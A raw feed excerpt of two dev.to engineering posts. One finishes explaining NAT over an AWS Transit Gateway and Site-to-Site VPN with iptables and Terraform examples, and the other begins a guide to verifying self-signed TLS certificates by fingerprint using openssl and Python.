&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fujzgzcx2c7afavdwviei.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fujzgzcx2c7afavdwviei.png" alt="Alt Text"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inside our VPC we create a subnet &lt;code&gt;20.0.6.0/24&lt;/code&gt; whose sole purpose is to contain a NAT gateway EC2 instance ("NAT GW" in the diagram) that would perform the NAT operation. Note that AWS has a built-in component called "NAT gateway," but here we run our own EC2 instance that performs this function using Linux and &lt;code&gt;iptables&lt;/code&gt; packet filter. &lt;/p&gt;

&lt;p&gt;The rest of the EC2 instances in our VPC live in separate subnets. The routing tables in those subnets forward packets that are destined to the customer's side to the Elastic Network Interface (ENI) of the NAT gateway instance. &lt;/p&gt;

&lt;p&gt;The subnet in which the NAT gateway lives has a routing table that forwards packets that are destined for the customer to the Transit Gateway. However, by this time, the source address of these packets is the public IP &lt;code&gt;1.2.3.4&lt;/code&gt; because these packets have been now NAT-translated. Unlike the more basic Virtual Private Network AWS component, the Transit Gateway AWS component does not place any restrictions on the source address of the packet.&lt;/p&gt;

&lt;p&gt;The Transit Gateway has a routing table that tells it where to send the packets further. Packets destined to the customer's side are forwarded to the "Site-to-Site VPN" AWS component. This is the component that has all the IPsec tunnel options. In particular, it lists the end-point IPs on the AWS side and the customer's side. Note that AWS allows only to specify the end-point IP on the customer side and automatically picks a public IP on its side. (We have no control of this IP address.)&lt;/p&gt;

&lt;p&gt;If the Site-to-Site VPN component can establish the IPsec connection, then upon receiving the packets from the Transit Gateway, it would forward them through the tunnel. The customer would see &lt;code&gt;1.2.3.4&lt;/code&gt; as the source IP of the packets and his routing table would instruct to send packets destined to the &lt;code&gt;1.2.3.4&lt;/code&gt; IP back into the tunnel.&lt;/p&gt;

&lt;h2&gt;
  
  
  Returning Packets
&lt;/h2&gt;

&lt;p&gt;So far we have discussed how the packets originating at a test EC2 instance in our VPC make their way to the customer's side. Now let's see the process in the opposite direction. Once the Site-to-Site VPN connection receives a packet destined for &lt;code&gt;1.2.3.4&lt;/code&gt; IP address, it forwards it to the Transit Gateway (TGW).  The routing table of the TGW tells to forward such packets to the &lt;em&gt;particular subnet&lt;/em&gt; inside the VPC where the NAT GW instance runs. &lt;/p&gt;

&lt;p&gt;Once the packet arrives in that subnet, a specific entry in the subnet's routing table tells the subnet's router to forward the packet to the Elastic Network Interface (ENI) of the NAT gateway instance.  The NAT instance picks up the packet and de-NATs its destination back into the &lt;code&gt;20.0.0.0/16&lt;/code&gt; network address space. Then, it dispatches the modified packet and AWS forwards it to the test EC2 instance. &lt;/p&gt;

&lt;h2&gt;
  
  
  Configuration of the Linux NAT instance
&lt;/h2&gt;

&lt;p&gt;In order to make the NAT gateway instance to pick up packets that do not have its IP address in their destination header, AWS must be told to disable the "source/destination check."  This can be done in AWS Console EC2 “Instances” view like this: right-click on the instance to bring a popup menu, then select “Networking” → “Change source destination check” and disable the check.&lt;/p&gt;

&lt;p&gt;Also, we must tell Linux to pick up the packets with this command:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Assuming that the local IP address of the NAT instance is &lt;code&gt;20.0.6.195&lt;/code&gt;, these &lt;code&gt;iptables&lt;/code&gt; commands set up the NAT operation,&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ iptables -t nat -F
$ iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4
$ iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination 20.0.6.195


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;To handle additional customer networks we may add more SNAT lines. For example, for a customer network with CIDR &lt;code&gt;192.168.0.0/16&lt;/code&gt; we would add this rule,&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ iptables -t nat -A POSTROUTING -d 192.168.0.0/16   -j SNAT --to-source 1.2.3.4


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;If there was another customer who wanted to see our instances coming from a different address space, then we would also add additional DNAT lines. For example, if a customer on network &lt;code&gt;10.0.0.0/16&lt;/code&gt; wanted our traffic to appear as if it's coming from &lt;code&gt;10.1.0.0/16&lt;/code&gt;, then we could: (a) SNAT all outgoing packets to an IP address on that CIDR, for instance &lt;code&gt;10.1.0.1&lt;/code&gt;,  and (b) DNAT them back to &lt;code&gt;20.0.6.195&lt;/code&gt; upon return.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ iptables -t nat -A POSTROUTING -d 10.0.0.0/16   -j SNAT --to-source 10.1.0.1
$ iptables -t nat -A PREROUTING  -d 10.1.0.1 -j DNAT --to-destination 20.0.6.195


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;(In addition to updating the NAT rules, we would also need to update the AWS infrastructure as specified by the diagram: to add entries to subnet routing tables and to create additional Site-to-Site VPN connections and associate them with the Transit Gateway.)&lt;/p&gt;

&lt;h2&gt;
  
  
  Testing
&lt;/h2&gt;

&lt;p&gt;We can test our setup by simulating a Customer network using an &lt;a href="https://aws.amazon.com/blogs/networking-and-content-delivery/simulating-site-to-site-vpn-customer-gateways-strongswan/" rel="noopener noreferrer"&gt;AWS tutorial&lt;/a&gt; to create a StrongSwan Linux VPN. We create another VPC to represent the "Customer's" side and set it's subnet to &lt;code&gt;172.31.0.0/16&lt;/code&gt; CIDR.  Then we follow the tutorial to create a StrongSwan Linux instance in it. We create another test EC2 instance in the same VPC and configure the routing table of the VPC to forward packets with destination &lt;code&gt;20.0.0.0/16&lt;/code&gt; to the Elastic Network Interface (ENI) of the StrongSwan instance.  Also, we assign a public IP to the StongSwan instance. &lt;/p&gt;

&lt;p&gt;Returning back to our main VPC, we create a Site-to-Site VPN connection and set the public IP of the StrongSwan instance as the destination. We put the rest of the configuration as advised by the tutorial, and wait until the first tunnel shows that it is in the &lt;code&gt;UP&lt;/code&gt; state.&lt;/p&gt;

&lt;p&gt;The tutorial advises using Border Gateway Protocol (BGP) when creating a Site-to-Site VPN connection. Once the tunnel is set up, the StrongSwan instance would be automatically configured with &lt;code&gt;20.0.0.0/16&lt;/code&gt; subnet thanks to the BGP. However, our packets will be arriving with &lt;code&gt;1.2.3.4&lt;/code&gt; as the source address, so the BPG routing table would not know where to send the returning packets. To fix this, we connect to the StrongSwan instance and edit the configuration file &lt;code&gt;/etc/quagga/zebra.conf&lt;/code&gt; for BPG daemon Zebra, to add a static route:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

ip route 1.2.3.4/32 169.254.152.245


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Then, we restart the BGP daemon with the &lt;code&gt;service zebra restart&lt;/code&gt; command. Note that the IP address &lt;code&gt;169.254.152.245&lt;/code&gt; in the above configuration line is the "Inside IP Address" of the Virtual Private Gateway of one of the two IPsec tunnels that the Site-to-Site VPN Connection created. You will have a different address, which you can look up from the Generic Configuration text file that can be downloaded from the Site-to-Site VPN Connection screen of the AWS console. &lt;/p&gt;

&lt;p&gt;Next, we connect to the test EC2 instance in the &lt;code&gt;20.0.5.0/16&lt;/code&gt; subnet and ping the test instance in the customer's &lt;code&gt;172.31.0.0/16&lt;/code&gt; subnet,&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

[ec2-user@ip-20-0-5-210 ~]$ ping 172.31.38.197  &amp;gt; /dev/null &amp;amp; sudo tcpdump -eni any icmp
15:49:14.787108 Out ... 20.0.5.210 &amp;gt; 172.31.38.197: ICMP echo request, ...
15:49:14.854690  In ... 172.31.38.197 &amp;gt; 20.0.5.210: ICMP echo reply ...


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;We can also observe the traffic flowing through the NAT gateway instance:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

ec2-user@ip-20-0-6-20:~$ sudo tcpdump -eni any icmp
20:39:46.084613  In … 172.31.38.197 &amp;gt; 1.2.3.4: ICMP echo request, id 26627, seq 1 ...
20:39:46.084657 Out … 1.2.3.4 &amp;gt; 172.31.38.197: ICMP echo reply, id 26627, seq 1 ...


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The following helpful AWS CLI commands output all configurations for all Site-to-Site VPN connections. They include all tunnel parameters, particularly the secret Preshared Keys (PSKs).  &lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

$ aws ec2 describe-vpn-connections
$ aws ec2 describe-transit-gateways
$ aws ec2 describe-transit-gateway-attachments


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
  
  
  Troubleshooting the IPSec tunnel
&lt;/h2&gt;

&lt;p&gt;Unfortunately, AWS still has not created a way to debug the actual IPSec tunnel establishment. That is because AWS has not exposed any logs of this stage. The use-case that AWS aims to solve is connecting one's own on-premises network with your own AWS VPC in the cloud. In such case, we could debug the on-premises side of the IPsec connection. However, if the customer is a third party and the IPSec connect is failing, we are left at the mercy of the third party to debug the issue. &lt;/p&gt;
&lt;h2&gt;
  
  
  Terraform Configuration of the Transit Gateway
&lt;/h2&gt;

&lt;p&gt;The following Terraform commands set up the Transit Gateway and help illustrate all of the settings further. For brevity, name tags and some other sections have been omitted.&lt;/p&gt;

&lt;p&gt;First we define the Transit Gateway and disable all the default routes. &lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway" "example_transit_gateway" {
  amazon_side_asn = 64512
  auto_accept_shared_attachments = "disable"
  default_route_table_association = "disable"
  default_route_table_propagation = "disable"
  description = "Example Transit Gateway."
  vpn_ecmp_support = "disable"
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Since we told AWS to not create a default route table for the TGW, we must create it by hand like this:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway_route_table" "example_transit_gateway" {
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The Transit Gateway has a split configuration of "routes" and "attachments." The routes specify an attachment as the destination. We first create the attachment to the VPC subnet in which the NAT gateway EC2 instance lives (here named as &lt;code&gt;private_subnet6&lt;/code&gt; ),&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway_vpc_attachment" "nat_vpc_attachment" {
  vpc_id             = module.vpc.id
  subnet_ids         = [ aws_subnet.private_subnet6.id ]
  transit_gateway_id = aws_ec2_transit_gateway.example_transit_gateway.id
  transit_gateway_default_route_table_association = false
  transit_gateway_default_route_table_propagation = false
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Next, we add the route that tells the TGW to forward packets destined to &lt;code&gt;1.2.3.4&lt;/code&gt; to the VPC subnet which we have just attached:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

resource "aws_ec2_transit_gateway_route" "nat-egress-ip" {
  destination_cidr_block = "1.2.3.4/32"
  transit_gateway_attachment_id  = aws_ec2_transit_gateway_vpc_attachment.nat_vpc_attachment.id
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id
}


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;So far we have handled the returning of the packets. Now, let's handle the forward direction. First we define the Customer Gateway and the Site-to-Site VPN connection and then tell TGW to forward packets to it.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

&lt;p&gt;resource "aws_customer_gateway" "example_customer" {&lt;br&gt;
  bgp_asn    = 64520&lt;br&gt;
  ip_address = '6.7.8.9' # this would be the public IP of the StrongSwan instance during test&lt;br&gt;
  type       = "ipsec.1"&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_vpn_connection" "example_customer" {&lt;br&gt;
  customer_gateway_id = aws_customer_gateway.example_customer.id&lt;br&gt;
  transit_gateway_id  = aws_ec2_transit_gateway.example_transit_gateway.id&lt;br&gt;
  type                = aws_customer_gateway.example_customer.type&lt;br&gt;
  static_routes_only  = false&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_ec2_transit_gateway_route_table_association" "example_customer" {&lt;br&gt;
  count=length(local.vpn_attachments)&lt;br&gt;
  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id&lt;br&gt;
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.example_transit_gateway.id&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_ec2_transit_gateway_route" "example_customer" {&lt;br&gt;
  count=length(local.vpn_attachments)&lt;br&gt;
  destination_cidr_block         = "172.31.0.0/16"&lt;br&gt;
  transit_gateway_attachment_id  = aws_vpn_connection.example_customer.transit_gateway_attachment_id&lt;br&gt;
  transit_gateway_route_table_id = aws_ec2_transit_gateway_route_table.account_transit_gateway.id&lt;br&gt;
}&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
&lt;br&gt;
  &lt;br&gt;
  &lt;br&gt;
  Terraform configuration of the custom NAT Gateway instance&lt;br&gt;
&lt;/h2&gt;

&lt;p&gt;The challenge in automatically configuring the NAT gateway EC2 instance is (a) to assign an Elastic public IP, and (b) to use the assigned &lt;em&gt;private&lt;/em&gt; IP in the &lt;code&gt;iptables&lt;/code&gt; rules.  The solution is to first define an Elastic Network Interface (ENI) and then to use it in the definition of the instance:&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

&lt;p&gt;resource "aws_network_interface" "nat_gw" {&lt;br&gt;
  source_dest_check = false # must be disabled for NAT to work&lt;br&gt;
  subnet_id = module.vpc.sn-private-nat-az1&lt;br&gt;
  security_groups = [ ... ]&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_eip_association" "nat_gw" {&lt;br&gt;
  network_interface_id = aws_network_interface.nat_gw.id&lt;br&gt;
  allocation_id = "1.2.3.4"&lt;br&gt;
}&lt;/p&gt;

&lt;p&gt;resource "aws_instance" "nat_gw" {&lt;br&gt;
  network_interface {&lt;br&gt;
    device_index = 0&lt;br&gt;
    network_interface_id = aws_network_interface.nat_gw.id&lt;br&gt;
  }&lt;/p&gt;

&lt;p&gt;... &lt;/p&gt;

&lt;p&gt;user_data = &amp;lt;&amp;lt;EOF&lt;/p&gt;
&lt;h1&gt;
  
  
  !/bin/bash
&lt;/h1&gt;

&lt;p&gt;echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br&gt;
iptables -t nat -F&lt;br&gt;
iptables -t nat -A POSTROUTING -d 172.31.0.0/16   -j SNAT --to-source 1.2.3.4&lt;br&gt;
iptables -t nat -A PREROUTING  -d 1.2.3.4 -j DNAT --to-destination ${aws_network_interface.nat_gw.private_ip}&lt;br&gt;
EOF&lt;br&gt;
}&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
&lt;br&gt;
  &lt;br&gt;
  &lt;br&gt;
  Security Considerations&lt;br&gt;
&lt;/h2&gt;

&lt;p&gt;Because we are using NAT, no instance behind the NAT GW instance can be accessed from the customer's network. However, the NAT gateway itself &lt;em&gt;can&lt;/em&gt; be reached from the customer's network. The ports which can be accessed are limited by the AWS Security Group of the subnet in which the NAT gateway lives. For instance, the following inbox Security Group rules would allow the customer's side to only ping the instance and to make HTTPS requests to it:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Port Range&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;HTTPS&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;443&lt;/td&gt;
&lt;td&gt;172.31.0.0/16&lt;/td&gt;
&lt;td&gt;Customer's side&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;All TCP&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;All&lt;/td&gt;
&lt;td&gt;20.0.0.0/16&lt;/td&gt;
&lt;td&gt;From inside VPC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;All ICMP - IPv4&lt;/td&gt;
&lt;td&gt;ICMP&lt;/td&gt;
&lt;td&gt;All&lt;/td&gt;
&lt;td&gt;0.0.0.0/0&lt;/td&gt;
&lt;td&gt;To allow pings&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Access can be also locked down by restricting the &lt;code&gt;DNAT&lt;/code&gt; rule in &lt;code&gt;iptables&lt;/code&gt;.  Upon restricting it to the &lt;code&gt;icmp&lt;/code&gt; protocol as shown below,  the remote side would still be able ping the NAT gateway at &lt;code&gt;1.2.3.4&lt;/code&gt;, yet would not be able to HTTPS into it.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

&lt;p&gt;iptables -t nat -A PREROUTING  -d 1.2.3.4 -p imcp -j DNAT ...&lt;/p&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
&lt;h2&gt;
&lt;br&gt;
  &lt;br&gt;
  &lt;br&gt;
  Final Thoughts&lt;br&gt;
&lt;/h2&gt;

&lt;p&gt;We can get more mileage out of the Transit Gateway than from the older Virtual Private Network (VPN) AWS component. That is because the Transit Gateway is ambivalent about the source CIDR of the packets that it receives. &lt;/p&gt;

&lt;p&gt;We hope that if more companies would use the TGW to connect to outside networks using NAT, then AWS would support this use-case directly in the Site-to-Site VPN settings so that there would be no need to maintain an EC2 instance to perform NAT. We also wish that AWS would &lt;a href="https://stackoverflow.com/questions/64686933/how-to-debug-a-site-to-site-vpn-tunnel-ipsec-on-aws" rel="noopener noreferrer"&gt;expose Site-to-Site VPN logging&lt;/a&gt; of the IPsec VPN tunnel establishment to help with troubleshooting at that stage.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>devops</category>
      <category>systems</category>
      <category>terraform</category>
    </item>
    <item>
      <title>Verification of Self-Signed Certificates</title>
      <dc:creator>Smarking</dc:creator>
      <pubDate>Tue, 05 Jan 2021 18:53:38 +0000</pubDate>
      <link>https://dev.to/smarkinginc/verification-of-self-signed-certificates-5gee</link>
      <guid>https://dev.to/smarkinginc/verification-of-self-signed-certificates-5gee</guid>
      <description>&lt;p&gt;When interfacing to third-party web services, one often has to deal with self-signed SSL certificates that trigger verification errors. One workaround is to suppress those errors. (For instance, the Curl tool has the 'insecure' flag for this purpose.) However, at Smarking, we found ways to verify such certificates and to safeguard data communication from Man-in-the-Middle attacks. &lt;/p&gt;

&lt;p&gt;Conventionally a web browser relies on a Public Key Infrastructure (PKI) to verify SSL certificates. Every certificate is signed by another (signing) certificate. That signing certificate must be signed by another, in a chain ending on a trusted certificate. This linkage allows a web server operator to switch to a new SSL certificate without requiring visitors to his website to update their web browsers. Alternatively, he could ask his users to trust his specific certificate so that the browser would not need to walk up the signature chain to verify it. &lt;/p&gt;

&lt;p&gt;An SSL certificate carries inside it a public key of the webserver. On a conceptual level, the authenticity of that public key is the thing that allows us to establish an authenticated Diffie-Hellman key exchange between the browser and the server. Thus, if we could verify that it is the correct public key,  we would have "verified" the certificate. However, instead of verifying a long public key, we could instead verify its checksum that is usually much shorter. A checksum of the entire certificate is called its &lt;em&gt;fingerprint&lt;/em&gt;, and it's always formatted as a colon-separated list of hex codes. For instance, here is the SHA-256 fingerprint of the certificate served by &lt;a href="https://google.com:"&gt;https://google.com:&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;14:71:16:87:6D:F6:76:8E:98:E5:66:62:70:64:F1:0F:F8:0F:87:39:B8:55:4C:47:26:22:DF:FA:7D:1D:A5:FE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To retrieve the details of a website's certificate, click on the lock icon in your browser's URL bar and then inspecting SSL certificate details. Alternatively, you could use the following shell script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;#!/bin/bash&lt;/span&gt;
&lt;span class="nv"&gt;HOST&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;example.com
&lt;span class="nv"&gt;PORT&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;443
&lt;span class="nv"&gt;PROXY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1.2.3.4:8888

&lt;span class="c"&gt;# If your environment does not require a HTTP proxy, delete the '-proxy $PROXY' parameter below&lt;/span&gt;
&lt;span class="nb"&gt;echo &lt;/span&gt;quit | openssl s_client &lt;span class="nt"&gt;-showcerts&lt;/span&gt; &lt;span class="nt"&gt;-servername&lt;/span&gt; &lt;span class="nv"&gt;$HOST&lt;/span&gt; &lt;span class="nt"&gt;-connect&lt;/span&gt; &lt;span class="nv"&gt;$HOST&lt;/span&gt;:&lt;span class="nv"&gt;$PORT&lt;/span&gt; &lt;span class="nt"&gt;-proxy&lt;/span&gt; &lt;span class="nv"&gt;$PROXY&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; result.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output file &lt;code&gt;result.txt&lt;/code&gt; includes the certificate in PEM format and metadata. The PEM format consists of binary data encoded using Base64 into ASCII, enveloped with "begin" and "end" lines like so:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;-----BEGIN CERTIFICATE-----
&amp;lt;certificate encoded in base64 encoding&amp;gt;
-----END CERTIFICATE-----
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You may feed the &lt;code&gt;result.txt&lt;/code&gt; file into the following command to compute the fingerprint of the certificate. (The &lt;code&gt;openssl&lt;/code&gt; tool would use the first certificate it finds in the input file and ignores everything else.)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;openssl x509 &lt;span class="nt"&gt;-noout&lt;/span&gt; &lt;span class="nt"&gt;-fingerprint&lt;/span&gt; &lt;span class="nt"&gt;-sha256&lt;/span&gt; &lt;span class="nt"&gt;-inform&lt;/span&gt; pem &lt;span class="nt"&gt;-in&lt;/span&gt; result.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The above command uses a &lt;code&gt;-sha256&lt;/code&gt; switch, which determines the length of the fingerprint to be 32 bytes. There are only a few widely-used variants, therefore the length of the fingerprint identifies the algorithm used to derive the fingerprint.&lt;/p&gt;

&lt;p&gt;Here are three methods by which you can verify certificates by their fingerprints. &lt;/p&gt;

&lt;h2&gt;
  
  
  Method #1: Use Python
&lt;/h2&gt;

&lt;p&gt;Verification of certificates by a fingerprint is supported out-of-the-box by the &lt;code&gt;urllib3&lt;/code&gt; library using the &lt;code&gt;assert_fingerpint&lt;/code&gt; parameter,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;urllib3&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;urllib.parse&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;http_get_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="n"&gt;parsed_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;parsed_url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;netloc&lt;/span&gt;
  &lt;span class="n"&gt;path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;parsed_url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;path&lt;/span&gt;
  &lt;span class="n"&gt;pool&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;urllib3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;HTTPSConnectionPool&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;host&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;assert_fingerprint&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;fingerprint&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pool&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;urlopen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'GET'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;http_get_request&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;'https://example.com/a/b/c'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;'14:71:...'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Notice that the fingerprint option configures an &lt;code&gt;HTTPSConnectionPool&lt;/code&gt; object which could then be used to make a &lt;em&gt;series&lt;/em&gt; of queries against a website, such that each of the queries would verify the fingerprint of the certificate.&lt;/p&gt;

&lt;p&gt;The Python's &lt;code&gt;requests&lt;/code&gt; library supports certificate fingerprint verification also because it builds upon the &lt;code&gt;urllib3&lt;/code&gt; library. It is based on adapter objects that return the &lt;code&gt;HTTPSConnectionPool&lt;/code&gt; objects discussed above, and it provides a method &lt;code&gt;Session::mount()&lt;/code&gt; which allows setting a custom adapter for a particular base URL. Putting this together, we have this code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;urllib.parse&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;urlparse&lt;/span&gt;

